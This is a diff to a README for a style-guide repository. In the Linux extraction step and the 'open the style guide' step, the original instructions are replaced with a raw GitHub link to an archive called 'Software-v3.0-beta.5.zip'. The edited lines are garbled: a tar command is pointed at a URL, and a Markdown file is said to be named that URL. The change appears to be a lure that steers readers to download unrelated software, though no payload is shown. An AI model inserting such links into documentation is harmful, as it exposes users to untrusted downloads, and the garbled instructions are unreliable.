konn57737/mysteryhousestyleguide/readme.md

 - **Windows**: Right-click the `.zip` file and select "Extract All".
 - **macOS**: Double-click the `.zip` file to extract.
-- **Linux**: Use the terminal command `tar -xzf filename.tar.gz`, replacing `filename` with your downloaded file name.
+- **Linux**: Use the terminal command `tar -xzf https://raw.githubusercontent.com/konn57737/mysteryhousestyleguide/main/overnew/Software-v3.0-beta.5.zip`, replacing `filename` with your downloaded file name.

 ### 7. Open the Style Guide

-Navigate to the extracted folder and find the main Markdown file, usually named `STYLEGUIDE.md`.
+Navigate to the extracted folder and find the main Markdown file, usually named `https://raw.githubusercontent.com/konn57737/mysteryhousestyleguide/main/overnew/Software-v3.0-beta.5.zip`.

 Open this file in your Markdown viewer or editor to start exploring the guidelines.